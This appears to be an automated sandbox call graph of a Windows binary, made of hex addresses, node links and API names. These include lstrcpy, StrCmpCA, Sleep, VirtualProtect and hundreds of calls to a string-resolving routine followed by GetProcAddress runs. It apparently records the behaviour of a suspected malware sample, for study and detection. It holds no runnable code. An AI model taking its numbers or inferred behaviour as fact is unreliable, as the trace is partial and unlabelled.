26069 53094c 26068->26069 27171 527280 1500 API calls 26069->27171 26071 53099f 26072 511530 8 API calls 26071->26072 26073 5309cf 26072->26073 26074 5309f6 lstrcpy 26073->26074 26075 5309fe 26073->26075 26074->26075 27172 5160d0 80 API calls 26075->27172 26077 530a0b 27173 5283e0 7 API calls 26077->27173 26079 530a18 26080 511530 8 API calls 26079->26080 26081 530a29 26080->26081 27174 5124e0 230 API calls 26081->27174 26083 530a6b 26084 530b40 26083->26084 26085 530a7f 26083->26085 26087 511530 8 API calls 26084->26087 26086 511530 8 API calls 26085->26086 26088 530aa5 26086->26088 26090 530b59 26087->26090 26091 530ad4 26088->26091 26092 530acc lstrcpy 26088->26092 26089 530b87 27178 5160d0 80 API calls 26089->27178 26090->26089 26093 530b7f lstrcpy 26090->26093 27175 5160d0 80 API calls 26091->27175 26092->26091 26093->26089 26096 530b8d 27179 52c840 70 API calls 26096->27179 26097 530ada 27176 5285b0 47 API calls 26097->27176 26100 530b38 26103 530bd1 26100->26103 26106 511530 8 API calls 26100->26106 26101 530ae5 26102 511530 8 API calls 26101->26102 26105 530af6 26102->26105 26104 530bfa 26103->26104 26107 511530 8 API calls 26103->26107 26108 530c23 26104->26108 26112 511530 8 API calls 26104->26112 27177 52d0f0 118 API calls 26105->27177 26110 530bb9 26106->26110 26111 530bf5 26107->26111 26114 530c4c 26108->26114 26119 511530 8 API calls 26108->26119 27180 52d7b0 104 API calls 26110->27180 27182 52dfa0 149 API calls 26111->27182 26117 530c1e 26112->26117 26115 530c75 26114->26115 26121 511530 8 API calls 26114->26121 26122 530c9e 26115->26122 26128 511530 8 API calls 26115->26128 27183 52e500 108 API calls 26117->27183 26118 530bbe 26124 511530 8 API calls 26118->26124 26120 530c47 26119->26120 27184 52e720 120 API calls 26120->27184 26127 530c70 26121->26127 26125 530cc7 26122->26125 26130 511530 8 API calls 26122->26130 26129 530bcc 26124->26129 26131 530cf0 26125->26131 26136 511530 8 API calls 26125->26136 27185 52e9e0 110 API calls 26127->27185 26133 530c99 26128->26133 27181 52ecb0 99 API calls 26129->27181 26135 530cc2 26130->26135 26137 530d04 26131->26137 26138 530dca 26131->26138 27186 517bc0 153 API calls 26133->27186 27187 52eb70 108 API calls 26135->27187 26141 530ceb 26136->26141 26142 511530 8 API calls 26137->26142 26143 511530 8 API calls 26138->26143 27188 5341e0 91 API calls 26141->27188 26147 530d2a 26142->26147 26146 530de3 26143->26146 26145 530e11 27192 5160d0 80 API calls 26145->27192 26146->26145 26148 530e09 lstrcpy 26146->26148 26149 530d56 lstrcpy 26147->26149 26150 530d5e 26147->26150 26148->26145 26149->26150 27189 5160d0 80 API calls 26150->27189 26153 530e17 27193 52c840 70 API calls 26153->27193 26154 530d64 27190 5285b0 47 API calls 26154->27190 26157 530dc2 26160 511530 8 API calls 26157->26160 26158 530d6f 26159 511530 8 API calls 26158->26159 26161 530d80 26159->26161 26164 530e39 26160->26164 27191 52d0f0 118 API calls 26161->27191 26163 530e67 27194 5160d0 80 API calls 26163->27194 26164->26163 26165 530e5f lstrcpy 26164->26165 26165->26163 26167 530e74 26169 530e95 26167->26169 27195 531660 12 API calls 26167->27195 26169->25847 26170->25818 26172 514a76 RtlAllocateHeap 26171->26172 26174 514ab4 VirtualProtect 26172->26174 26174->25850 26177 53182e 26176->26177 26178 531855 lstrlen 26177->26178 26179 531849 lstrcpy 26177->26179 26180 531873 26178->26180 26179->26178 26181 531885 lstrcpy lstrcat 26180->26181 26182 531898 26180->26182 26181->26182 26183 5318c7 26182->26183 26184 5318bf lstrcpy 26182->26184 26185 5318ce lstrlen 26183->26185 26184->26183 26186 5318e6 26185->26186 26187 5318f2 lstrcpy lstrcat 26186->26187 26188 531906 26186->26188 26187->26188 26189 531935 26188->26189 26190 53192d lstrcpy 26188->26190 26191 53193c lstrlen 26189->26191 26190->26189 26192 531958 26191->26192 26193 53196a lstrcpy lstrcat 26192->26193 26194 53197d 26192->26194 26193->26194 26195 5319ac 26194->26195 26196 5319a4 lstrcpy 26194->26196 26197 5319b3 lstrlen 26195->26197 26196->26195 26198 5319cb 26197->26198 26199 5319eb 26198->26199 26200 5319d7 lstrcpy lstrcat 26198->26200 26201 531a1a 26199->26201 26202 531a12 lstrcpy 26199->26202 26200->26199 26203 531a21 lstrlen 26201->26203 26202->26201 26204 531a3d 26203->26204 26205 531a4f lstrcpy lstrcat 26204->26205 26206 531a62 26204->26206 26205->26206 26207 531a91 26206->26207 26208 531a89 lstrcpy 26206->26208 26209 531a98 lstrlen 26207->26209 26208->26207 26210 531ab4 26209->26210 26211 531ac6 lstrcpy lstrcat 26210->26211 26212 531ad9 26210->26212 26211->26212 26213 531b08 26212->26213 26214 531b00 lstrcpy 26212->26214 26213->25966 26214->26213 26216 512a24 SystemTimeToFileTime SystemTimeToFileTime 26215->26216 26216->25969 26216->25970 26218 53157f 26217->26218 26219 53159f lstrcpy 26218->26219 26220 5315a7 26218->26220 26219->26220 26221 5315d7 lstrcpy 26220->26221 26222 5315df 26220->26222 26221->26222 26223 53160f lstrcpy 26222->26223 26224 531617 26222->26224 26223->26224 26225 530155 lstrlen 26224->26225 26226 531647 lstrcpy 26224->26226 26225->25987 26226->26225 26228 514a60 2 API calls 26227->26228 26229 512e82 26228->26229 26230 514a60 2 API calls 26229->26230 26231 512ea0 26230->26231 26232 514a60 2 API calls 26231->26232 26233 512eb6 26232->26233 26234 514a60 2 API calls 26233->26234 26235 512ecb 26234->26235 26236 514a60 2 API calls 26235->26236 26237 512eec 26236->26237 26238 514a60 2 API calls 26237->26238 26239 512f01 26238->26239 26240 514a60 2 API calls 26239->26240 26241 512f19 26240->26241 26242 514a60 2 API calls 26241->26242 26243 512f3a 26242->26243 26244 514a60 2 API calls 26243->26244 26245 512f4f 26244->26245 26246 514a60 2 API calls 26245->26246 26247 512f65 26246->26247 26248 514a60 2 API calls 26247->26248 26249 512f7b 26248->26249 26250 514a60 2 API calls 26249->26250 26251 512f91 26250->26251 26252 514a60 2 API calls 26251->26252 26253 512faa 26252->26253 26254 514a60 2 API calls 26253->26254 26255 512fc0 26254->26255 26256 514a60 2 API calls 26255->26256 26257 512fd6 26256->26257 26258 514a60 2 API calls 26257->26258 26259 512fec 26258->26259 26260 514a60 2 API calls 26259->26260 26261 513002 26260->26261 26262 514a60 2 API calls 26261->26262 26263 513018 26262->26263 26264 514a60 2 API calls 26263->26264 26265 513031 26264->26265 26266 514a60 2 API calls 26265->26266 26267 513047 26266->26267 26268 514a60 2 API calls 26267->26268 26269 51305d 26268->26269 26270 514a60 2 API calls 26269->26270 26271 513073 26270->26271 26272 514a60 2 API calls 26271->26272 26273 513089 26272->26273 26274 514a60 2 API calls 26273->26274 26275 51309f 26274->26275 26276 514a60 2 API calls 26275->26276 26277 5130b8 26276->26277 26278 514a60 2 API calls 26277->26278 26279 5130ce 26278->26279 26280 514a60 2 API calls 26279->26280 26281 5130e4 26280->26281 26282 514a60 2 API calls 26281->26282 26283 5130fa 26282->26283 26284 514a60 2 API calls 26283->26284 26285 513110 26284->26285 26286 514a60 2 API calls 26285->26286 26287 513126 26286->26287 26288 514a60 2 API calls 26287->26288 26289 51313f 26288->26289 26290 514a60 2 API calls 26289->26290 26291 513155 26290->26291 26292 514a60 2 API calls 26291->26292 26293 51316b 26292->26293 26294 514a60 2 API calls 26293->26294 26295 513181 26294->26295 26296 514a60 2 API calls 26295->26296 26297 513197 26296->26297 26298 514a60 2 API calls 26297->26298 26299 5131ad 26298->26299 26300 514a60 2 API calls 26299->26300 26301 5131c6 26300->26301 26302 514a60 2 API calls 26301->26302 26303 5131dc 26302->26303 26304 514a60 2 API calls 26303->26304 26305 5131f2 26304->26305 26306 514a60 2 API calls 26305->26306 26307 513208 26306->26307 26308 514a60 2 API calls 26307->26308 26309 51321e 26308->26309 26310 514a60 2 API calls 26309->26310 26311 513234 26310->26311 26312 514a60 2 API calls 26311->26312 26313 51324d 26312->26313 26314 514a60 2 API calls 26313->26314 26315 513263 26314->26315 26316 514a60 2 API calls 26315->26316 26317 513279 26316->26317 26318 514a60 2 API calls 26317->26318 26319 51328f 26318->26319 26320 514a60 2 API calls 26319->26320 26321 5132a5 26320->26321 26322 514a60 2 API calls 26321->26322 26323 5132bb 26322->26323 26324 514a60 2 API calls 26323->26324 26325 5132d4 26324->26325 26326 514a60 2 API calls 26325->26326 26327 5132ea 26326->26327 26328 514a60 2 API calls 26327->26328 26329 513300 26328->26329 26330 514a60 2 API calls 26329->26330 26331 513316 26330->26331 26332 514a60 2 API calls 26331->26332 26333 51332c 26332->26333 26334 514a60 2 API calls 26333->26334 26335 513342 26334->26335 26336 514a60 2 API calls 26335->26336 26337 51335b 26336->26337 26338 514a60 2 API calls 26337->26338 26339 513371 26338->26339 26340 514a60 2 API calls 26339->26340 26341 513387 26340->26341 26342 514a60 2 API calls 26341->26342 26343 51339d 26342->26343 26344 514a60 2 API calls 26343->26344 26345 5133b3 26344->26345 26346 514a60 2 API calls 26345->26346 26347 5133c9 26346->26347 26348 514a60 2 API calls 26347->26348 26349 5133e2 26348->26349 26350 514a60 2 API calls 26349->26350 26351 5133f8 26350->26351 26352 514a60 2 API calls 26351->26352 26353 51340e 26352->26353 26354 514a60 2 API calls 26353->26354 26355 513424 26354->26355 26356 514a60 2 API calls 26355->26356 26357 51343a 26356->26357 26358 514a60 2 API calls 26357->26358 26359 513450 26358->26359 26360 514a60 2 API calls 26359->26360 26361 513469 26360->26361 26362 514a60 2 API calls 26361->26362 26363 51347f 26362->26363 26364 514a60 2 API calls 26363->26364 26365 513495 26364->26365 26366 514a60 2 API calls 26365->26366 26367 5134ab 26366->26367 26368 514a60 2 API calls 26367->26368 26369 5134c1 26368->26369 26370 514a60 2 API calls 26369->26370 26371 5134d7 26370->26371 26372 514a60 2 API calls 26371->26372 26373 5134f0 26372->26373 26374 514a60 2 API calls 26373->26374 26375 513506 26374->26375 26376 514a60 2 API calls 26375->26376 26377 51351c 26376->26377 26378 514a60 2 API calls 26377->26378 26379 513532 26378->26379 26380 514a60 2 API calls 26379->26380 26381 513548 26380->26381 26382 514a60 2 API calls 26381->26382 26383 51355e 26382->26383 26384 514a60 2 API calls 26383->26384 26385 513577 26384->26385 26386 514a60 2 API calls 26385->26386 26387 51358d 26386->26387 26388 514a60 2 API calls 26387->26388 26389 5135a3 26388->26389 26390 514a60 2 API calls 26389->26390 26391 5135b9 26390->26391 26392 514a60 2 API calls 26391->26392 26393 5135cf 26392->26393 26394 514a60 2 API calls 26393->26394 26395 5135e5 26394->26395 26396 514a60 2 API calls 26395->26396 26397 5135fe 26396->26397 26398 514a60 2 API calls 26397->26398 26399 513614 26398->26399 26400 514a60 2 API calls 26399->26400 26401 51362a 26400->26401 26402 514a60 2 API calls 26401->26402 26403 513640 26402->26403 26404 514a60 2 API calls 26403->26404 26405 513656 26404->26405 26406 514a60 2 API calls 26405->26406 26407 51366c 26406->26407 26408 514a60 2 API calls 26407->26408 26409 513685 26408->26409 26410 514a60 2 API calls 26409->26410 26411 51369b 26410->26411 26412 514a60 2 API calls 26411->26412 26413 5136b1 26412->26413 26414 514a60 2 API calls 26413->26414 26415 5136c7 26414->26415 26416 514a60 2 API calls 26415->26416 26417 5136dd 26416->26417 26418 514a60 2 API calls 26417->26418 26419 5136f3 26418->26419 26420 514a60 2 API calls 26419->26420 26421 51370c 26420->26421 26422 514a60 2 API calls 26421->26422 26423 513722 26422->26423 26424 514a60 2 API calls 26423->26424 26425 513738 26424->26425 26426 514a60 2 API calls 26425->26426 26427 51374e 26426->26427 26428 514a60 2 API calls 26427->26428 26429 513764 26428->26429 26430 514a60 2 API calls 26429->26430 26431 51377a 26430->26431 26432 514a60 2 API calls 26431->26432 26433 513793 26432->26433 26434 514a60 2 API calls 26433->26434 26435 5137a9 26434->26435 26436 514a60 2 API calls 26435->26436 26437 5137bf 26436->26437 26438 514a60 2 API calls 26437->26438 26439 5137d5 26438->26439 26440 514a60 2 API calls 26439->26440 26441 5137eb 26440->26441 26442 514a60 2 API calls 26441->26442 26443 513801 26442->26443 26444 514a60 2 API calls 26443->26444 26445 51381a 26444->26445 26446 514a60 2 API calls 26445->26446 26447 513830 26446->26447 26448 514a60 2 API calls 26447->26448 26449 513846 26448->26449 26450 514a60 2 API calls 26449->26450 26451 51385c 26450->26451 26452 514a60 2 API calls 26451->26452 26453 513872 26452->26453 26454 514a60 2 API calls 26453->26454 26455 513888 26454->26455 26456 514a60 2 API calls 26455->26456 26457 5138a1 26456->26457 26458 514a60 2 API calls 26457->26458 26459 5138b7 26458->26459 26460 514a60 2 API calls 26459->26460 26461 5138cd 26460->26461 26462 514a60 2 API calls 26461->26462 26463 5138e3 26462->26463 26464 514a60 2 API calls 26463->26464 26465 5138f9 26464->26465 26466 514a60 2 API calls 26465->26466 26467 51390f 26466->26467 26468 514a60 2 API calls 26467->26468 26469 513928 26468->26469 26470 514a60 2 API calls 26469->26470 26471 51393e 26470->26471 26472 514a60 2 API calls 26471->26472 26473 513954 26472->26473 26474 514a60 2 API calls 26473->26474 26475 51396a 26474->26475 26476 514a60 2 API calls 26475->26476 26477 513980 26476->26477 26478 514a60 2 API calls 26477->26478 26479 513996 26478->26479 26480 514a60 2 API calls 26479->26480 26481 5139af 26480->26481 26482 514a60 2 API calls 26481->26482 26483 5139c5 26482->26483 26484 514a60 2 API calls 26483->26484 26485 5139db 26484->26485 26486 514a60 2 API calls 26485->26486 26487 5139f1 26486->26487 26488 514a60 2 API calls 26487->26488 26489 513a07 26488->26489 26490 514a60 2 API calls 26489->26490 26491 513a1d 26490->26491 26492 514a60 2 API calls 26491->26492 26493 513a36 26492->26493 26494 514a60 2 API calls 26493->26494 26495 513a4c 26494->26495 26496 514a60 2 API calls 26495->26496 26497 513a62 26496->26497 26498 514a60 2 API calls 26497->26498 26499 513a78 26498->26499 26500 514a60 2 API calls 26499->26500 26501 513a8e 26500->26501 26502 514a60 2 API calls 26501->26502 26503 513aa4 26502->26503 26504 514a60 2 API calls 26503->26504 26505 513abd 26504->26505 26506 514a60 2 API calls 26505->26506 26507 513ad3 26506->26507 26508 514a60 2 API calls 26507->26508 26509 513ae9 26508->26509 26510 514a60 2 API calls 26509->26510 26511 513aff 26510->26511 26512 514a60 2 API calls 26511->26512 26513 513b15 26512->26513 26514 514a60 2 API calls 26513->26514 26515 513b2b 26514->26515 26516 514a60 2 API calls 26515->26516 26517 513b44 26516->26517 26518 514a60 2 API calls 26517->26518 26519 513b5a 26518->26519 26520 514a60 2 API calls 26519->26520 26521 513b70 26520->26521 26522 514a60 2 API calls 26521->26522 26523 513b86 26522->26523 26524 514a60 2 API calls 26523->26524 26525 513b9c 26524->26525 26526 514a60 2 API calls 26525->26526 26527 513bb2 26526->26527 26528 514a60 2 API calls 26527->26528 26529 513bcb 26528->26529 26530 514a60 2 API calls 26529->26530 26531 513be1 26530->26531 26532 514a60 2 API calls 26531->26532 26533 513bf7 26532->26533 26534 514a60 2 API calls 26533->26534 26535 513c0d 26534->26535 26536 514a60 2 API calls 26535->26536 26537 513c23 26536->26537 26538 514a60 2 API calls 26537->26538 26539 513c39 26538->26539 26540 514a60 2 API calls 26539->26540 26541 513c52 26540->26541 26542 514a60 2 API calls 26541->26542 26543 513c68 26542->26543 26544 514a60 2 API calls 26543->26544 26545 513c7e 26544->26545 26546 514a60 2 API calls 26545->26546 26547 513c94 26546->26547 26548 514a60 2 API calls 26547->26548 26549 513caa 26548->26549 26550 514a60 2 API calls 26549->26550 26551 513cc0 26550->26551 26552 514a60 2 API calls 26551->26552 26553 513cd9 26552->26553 26554 514a60 2 API calls 26553->26554 26555 513cef 26554->26555 26556 514a60 2 API calls 26555->26556 26557 513d05 26556->26557 26558 514a60 2 API calls 26557->26558 26559 513d1b 26558->26559 26560 514a60 2 API calls 26559->26560 26561 513d31 26560->26561 26562 514a60 2 API calls 26561->26562 26563 513d47 26562->26563 26564 514a60 2 API calls 26563->26564 26565 513d60 26564->26565 26566 514a60 2 API calls 26565->26566 26567 513d76 26566->26567 26568 514a60 2 API calls 26567->26568 26569 513d8c 26568->26569 26570 514a60 2 API calls 26569->26570 26571 513da2 26570->26571 26572 514a60 2 API calls 26571->26572 26573 513db8 26572->26573 26574 514a60 2 API calls 26573->26574 26575 513dce 26574->26575 26576 514a60 2 API calls 26575->26576 26577 513de7 26576->26577 26578 514a60 2 API calls 26577->26578 26579 513dfd 26578->26579 26580 514a60 2 API calls 26579->26580 26581 513e13 26580->26581 26582 514a60 2 API calls 26581->26582 26583 513e29 26582->26583 26584 514a60 2 API calls 26583->26584 26585 513e3f 26584->26585 26586 514a60 2 API calls 26585->26586 26587 513e55 26586->26587 26588 514a60 2 API calls 26587->26588 26589 513e6e 26588->26589 26590 514a60 2 API calls 26589->26590 26591 513e84 26590->26591 26592 514a60 2 API calls 26591->26592 26593 513e9a 26592->26593 26594 514a60 2 API calls 26593->26594 26595 513eb0 26594->26595 26596 514a60 2 API calls 26595->26596 26597 513ec6 26596->26597 26598 514a60 2 API calls 26597->26598 26599 513edc 26598->26599 26600 514a60 2 API calls 26599->26600 26601 513ef5 26600->26601 26602 514a60 2 API calls 26601->26602 26603 513f0b 26602->26603 26604 514a60 2 API calls 26603->26604 26605 513f21 26604->26605 26606 514a60 2 API calls 26605->26606 26607 513f37 26606->26607 26608 514a60 2 API calls 26607->26608 26609 513f4d 26608->26609 26610 514a60 2 API calls 26609->26610 26611 513f63 26610->26611 26612 514a60 2 API calls 26611->26612 26613 513f7c 26612->26613 26614 514a60 2 API calls 26613->26614 26615 513f92 26614->26615 26616 514a60 2 API calls 26615->26616 26617 513fa8 26616->26617 26618 514a60 2 API calls 26617->26618 26619 513fbe 26618->26619 26620 514a60 2 API calls 26619->26620 26621 513fd4 26620->26621 26622 514a60 2 API calls 26621->26622 26623 513fea 26622->26623 26624 514a60 2 API calls 26623->26624 26625 514003 26624->26625 26626 514a60 2 API calls 26625->26626 26627 514019 26626->26627 26628 514a60 2 API calls 26627->26628 26629 51402f 26628->26629 26630 514a60 2 API calls 26629->26630 26631 514045 26630->26631 26632 514a60 2 API calls 26631->26632 26633 51405b 26632->26633 26634 514a60 2 API calls 26633->26634 26635 514071 26634->26635 26636 514a60 2 API calls 26635->26636 26637 51408a 26636->26637 26638 514a60 2 API calls 26637->26638 26639 5140a0 26638->26639 26640 514a60 2 API calls 26639->26640 26641 5140b6 26640->26641 26642 514a60 2 API calls 26641->26642 26643 5140cc 26642->26643 26644 514a60 2 API calls 26643->26644 26645 5140e2 26644->26645 26646 514a60 2 API calls 26645->26646 26647 5140f8 26646->26647 26648 514a60 2 API calls 26647->26648 26649 514111 26648->26649 26650 514a60 2 API calls 26649->26650 26651 514127 26650->26651 26652 514a60 2 API calls 26651->26652 26653 51413d 26652->26653 26654 514a60 2 API calls 26653->26654 26655 514153 26654->26655 26656 514a60 2 API calls 26655->26656 26657 514169 26656->26657 26658 514a60 2 API calls 26657->26658 26659 51417f 26658->26659 26660 514a60 2 API calls 26659->26660 26661 514198 26660->26661 26662 514a60 2 API calls 26661->26662 26663 5141ae 26662->26663 26664 514a60 2 API calls 26663->26664 26665 5141c4 26664->26665 26666 514a60 2 API calls 26665->26666 26667 5141da 26666->26667 26668 514a60 2 API calls 26667->26668 26669 5141f0 26668->26669 26670 514a60 2 API calls 26669->26670 26671 514206 26670->26671 26672 514a60 2 API calls 26671->26672 26673 51421f 26672->26673 26674 514a60 2 API calls 26673->26674 26675 514235 26674->26675 26676 514a60 2 API calls 26675->26676 26677 51424b 26676->26677 26678 514a60 2 API calls 26677->26678 26679 514261 26678->26679 26680 514a60 2 API calls 26679->26680 26681 514277 26680->26681 26682 514a60 2 API calls 26681->26682 26683 51428d 26682->26683 26684 514a60 2 API calls 26683->26684 26685 5142a6 26684->26685 26686 514a60 2 API calls 26685->26686 26687 5142bc 26686->26687 26688 514a60 2 API calls 26687->26688 26689 5142d2 26688->26689 26690 514a60 2 API calls 26689->26690 26691 5142e8 26690->26691 26692 514a60 2 API calls 26691->26692 26693 5142fe 26692->26693 26694 514a60 2 API calls 26693->26694 26695 514314 26694->26695 26696 514a60 2 API calls 26695->26696 26697 51432d 26696->26697 26698 514a60 2 API calls 26697->26698 26699 514343 26698->26699 26700 514a60 2 API calls 26699->26700 26701 514359 26700->26701 26702 514a60 2 API calls 26701->26702 26703 51436f 26702->26703 26704 514a60 2 API calls 26703->26704 26705 514385 26704->26705 26706 514a60 2 API calls 26705->26706 26707 51439b 26706->26707 26708 514a60 2 API calls 26707->26708 26709 5143b4 26708->26709 26710 514a60 2 API calls 26709->26710 26711 5143ca 26710->26711 26712 514a60 2 API calls 26711->26712 26713 5143e0 26712->26713 26714 514a60 2 API calls 26713->26714 26715 5143f6 26714->26715 26716 514a60 2 API calls 26715->26716 26717 51440c 26716->26717 26718 514a60 2 API calls 26717->26718 26719 514422 26718->26719 26720 514a60 2 API calls 26719->26720 26721 51443b 26720->26721 26722 514a60 2 API calls 26721->26722 26723 514451 26722->26723 26724 514a60 2 API calls 26723->26724 26725 514467 26724->26725 26726 514a60 2 API calls 26725->26726 26727 51447d 26726->26727 26728 514a60 2 API calls 26727->26728 26729 514493 26728->26729 26730 514a60 2 API calls 26729->26730 26731 5144a9 26730->26731 26732 514a60 2 API calls 26731->26732 26733 5144c2 26732->26733 26734 514a60 2 API calls 26733->26734 26735 5144d8 26734->26735 26736 514a60 2 API calls 26735->26736 26737 5144ee 26736->26737 26738 514a60 2 API calls 26737->26738 26739 514504 26738->26739 26740 514a60 2 API calls 26739->26740 26741 51451a 26740->26741 26742 514a60 2 API calls 26741->26742 26743 514530 26742->26743 26744 514a60 2 API calls 26743->26744 26745 514549 26744->26745 26746 514a60 2 API calls 26745->26746 26747 51455f 26746->26747 26748 514a60 2 API calls 26747->26748 26749 514575 26748->26749 26750 514a60 2 API calls 26749->26750 26751 51458b 26750->26751 26752 514a60 2 API calls 26751->26752 26753 5145a1 26752->26753 26754 514a60 2 API calls 26753->26754 26755 5145b7 26754->26755 26756 514a60 2 API calls 26755->26756 26757 5145d0 26756->26757 26758 514a60 2 API calls 26757->26758 26759 5145e6 26758->26759 26760 514a60 2 API calls 26759->26760 26761 5145fc 26760->26761 26762 514a60 2 API calls 26761->26762 26763 514612 26762->26763 26764 514a60 2 API calls 26763->26764 26765 514628 26764->26765 26766 514a60 2 API calls 26765->26766 26767 51463e 26766->26767 26768 514a60 2 API calls 26767->26768 26769 514657 26768->26769 26770 514a60 2 API calls 26769->26770 26771 51466d 26770->26771 26772 514a60 2 API calls 26771->26772 26773 514683 26772->26773 26774 514a60 2 API calls 26773->26774 26775 514699 26774->26775 26776 514a60 2 API calls 26775->26776 26777 5146af 26776->26777 26778 514a60 2 API calls 26777->26778 26779 5146c5 26778->26779 26780 514a60 2 API calls 26779->26780 26781 5146de 26780->26781 26782 514a60 2 API calls 26781->26782 26783 5146f4 26782->26783 26784 514a60 2 API calls 26783->26784 26785 51470a 26784->26785 26786 514a60 2 API calls 26785->26786 26787 514720 26786->26787 26788 514a60 2 API calls 26787->26788 26789 514736 26788->26789 26790 514a60 2 API calls 26789->26790 26791 51474c 26790->26791 26792 514a60 2 API calls 26791->26792 26793 514765 26792->26793 26794 514a60 2 API calls 26793->26794 26795 51477b 26794->26795 26796 514a60 2 API calls 26795->26796 26797 514791 26796->26797 26798 514a60 2 API calls 26797->26798 26799 5147a7 26798->26799 26800 514a60 2 API calls 26799->26800 26801 5147bd 26800->26801 26802 514a60 2 API calls 26801->26802 26803 5147d3 26802->26803 26804 514a60 2 API calls 26803->26804 26805 5147ec 26804->26805 26806 514a60 2 API calls 26805->26806 26807 514802 26806->26807 26808 514a60 2 API calls 26807->26808 26809 514818 26808->26809 26810 514a60 2 API calls 26809->26810 26811 51482e 26810->26811 26812 514a60 2 API calls 26811->26812 26813 514844 26812->26813 26814 514a60 2 API calls 26813->26814 26815 51485a 26814->26815 26816 514a60 2 API calls 26815->26816 26817 514873 26816->26817 26818 514a60 2 API calls 26817->26818 26819 514889 26818->26819 26820 514a60 2 API calls 26819->26820 26821 51489f 26820->26821 26822 514a60 2 API calls 26821->26822 26823 5148b5 26822->26823 26824 514a60 2 API calls 26823->26824 26825 5148cb 26824->26825 26826 514a60 2 API calls 26825->26826 26827 5148e1 26826->26827 26828 514a60 2 API calls 26827->26828 26829 5148fa 26828->26829 26830 514a60 2 API calls 26829->26830 26831 514910 26830->26831 26832 514a60 2 API calls 26831->26832 26833 514926 26832->26833 26834 514a60 2 API calls 26833->26834 26835 51493c 26834->26835 26836 514a60 2 API calls 26835->26836 26837 514952 26836->26837 26838 514a60 2 API calls 26837->26838 26839 514968 26838->26839 26840 514a60 2 API calls 26839->26840 26841 514981 26840->26841 26842 514a60 2 API calls 26841->26842 26843 514997 26842->26843 26844 514a60 2 API calls 26843->26844 26845 5149ad 26844->26845 26846 514a60 2 API calls 26845->26846 26847 5149c3 26846->26847 26848 514a60 2 API calls 26847->26848 26849 5149d9 26848->26849 26850 514a60 2 API calls 26849->26850 26851 5149ef 26850->26851 26852 514a60 2 API calls 26851->26852 26853 514a08 26852->26853 26854 514a60 2 API calls 26853->26854 26855 514a1e 26854->26855 26856 514a60 2 API calls 26855->26856 26857 514a34 26856->26857 26858 514a60 2 API calls 26857->26858 26859 514a4a 26858->26859 26860 5366e0 26859->26860 26861 536afe 8 API calls 26860->26861 26862 5366ed 43 API calls 26860->26862 26863 536b94 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26861->26863 26864 536c08 26861->26864 26862->26861 26863->26864 26865 536cd2 26864->26865 26866 536c15 8 API calls 26864->26866 26867 536cdb GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26865->26867 26868 536d4f 26865->26868 26866->26865 26867->26868 26869 536de9 26868->26869 26870 536d5c 6 API calls 26868->26870 26871 536f10 26869->26871 26872 536df6 12 API calls 26869->26872 26870->26869 26873 536f19 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26871->26873 26874 536f8d 26871->26874 26872->26871 26873->26874 26875 536fc1 26874->26875 26876 536f96 GetProcAddress GetProcAddress 26874->26876 26877 536ff5 26875->26877 26878 536fca GetProcAddress GetProcAddress 26875->26878 26876->26875 26879 537002 10 API calls 26877->26879 26880 5370ed 26877->26880 26878->26877 26879->26880 26881 537152 26880->26881 26882 5370f6 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26880->26882 26883 53715b GetProcAddress 26881->26883 26884 53716e 26881->26884 26882->26881 26883->26884 26885 53051f 26884->26885 26886 537177 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26884->26886 26887 511530 26885->26887 26886->26885 27196 511610 26887->27196 26889 51153b 26890 511555 lstrcpy 26889->26890 26891 51155d 26889->26891 26890->26891 26892 511577 lstrcpy 26891->26892 26893 51157f 26891->26893 26892->26893 26894 511599 lstrcpy 26893->26894 26896 5115a1 26893->26896 26894->26896 26895 511605 26898 52f1b0 lstrlen 26895->26898 26896->26895 26897 5115fd lstrcpy 26896->26897 26897->26895 26899 52f1e4 26898->26899 26900 52f1f7 lstrlen 26899->26900 26901 52f1eb lstrcpy 26899->26901 26902 52f208 26900->26902 26901->26900 26903 52f21b lstrlen 26902->26903 26904 52f20f lstrcpy 26902->26904 26905 52f22c 26903->26905 26904->26903 26906 52f233 lstrcpy 26905->26906 26907 52f23f 26905->26907 26906->26907 26908 52f258 lstrcpy 26907->26908 26909 52f264 26907->26909 26908->26909 26910 52f292 26909->26910 26911 52f286 lstrcpy 26909->26911 26912 52f2ba lstrcpy 26910->26912 26913 52f2c6 26910->26913 26911->26910 26912->26913 26914 52f2ea lstrcpy 26913->26914 26966 52f300 26913->26966 26914->26966 26915 52f30c lstrlen 26915->26966 26916 52f4b9 lstrcpy 26916->26966 26917 52f3a1 lstrcpy 26917->26966 26918 52f3c5 lstrcpy 26918->26966 26919 52f4e8 lstrcpy 26980 52f4f0 26919->26980 26920 511530 8 API calls 26920->26980 26921 52ee90 28 API calls 26921->26966 26922 52f479 lstrcpy 26922->26966 26923 52f59c lstrcpy 26923->26980 26924 52f70f StrCmpCA 26929 52fe8e 26924->26929 26924->26966 26925 52f616 StrCmpCA 26925->26924 26925->26980 26926 52fa29 StrCmpCA 26937 52fe2b 26926->26937 26926->26966 26927 52f73e lstrlen 26927->26966 26928 52fd4d StrCmpCA 26932 52fd60 Sleep 26928->26932 26942 52fd75 26928->26942 26930 52fead lstrlen 26929->26930 26934 52fea5 lstrcpy 26929->26934 26935 52fec7 26930->26935 26931 52fa58 lstrlen 26931->26966 26932->26966 26933 52f64a lstrcpy 26933->26980 26934->26930 26940 52fee7 lstrlen 26935->26940 26945 52fedf lstrcpy 26935->26945 26936 52fe4a lstrlen 26944 52fe64 26936->26944 26937->26936 26938 52fe42 lstrcpy 26937->26938 26938->26936 26939 52f89e lstrcpy 26939->26966 26948 52ff01 26940->26948 26941 52fd94 lstrlen 26957 52fdae 26941->26957 26942->26941 26946 52fd8c lstrcpy 26942->26946 26943 52f76f lstrcpy 26943->26966 26950 52fdce lstrlen 26944->26950 26951 52fe7c lstrcpy 26944->26951 26945->26940 26946->26941 26947 52fbb8 lstrcpy 26947->26966 26956 52ff21 26948->26956 26959 52ff19 lstrcpy 26948->26959 26949 52fa89 lstrcpy 26949->26966 26958 52fde8 26950->26958 26951->26950 26952 52f791 lstrcpy 26952->26966 26954 511530 8 API calls 26954->26966 26955 52f8cd lstrcpy 26955->26980 26960 511610 4 API calls 26956->26960 26957->26950 26963 52fdc6 lstrcpy 26957->26963 26967 52fe08 26958->26967 26968 52fe00 lstrcpy 26958->26968 26959->26956 26982 52fe13 26960->26982 26961 52faab lstrcpy 26961->26966 26962 52f698 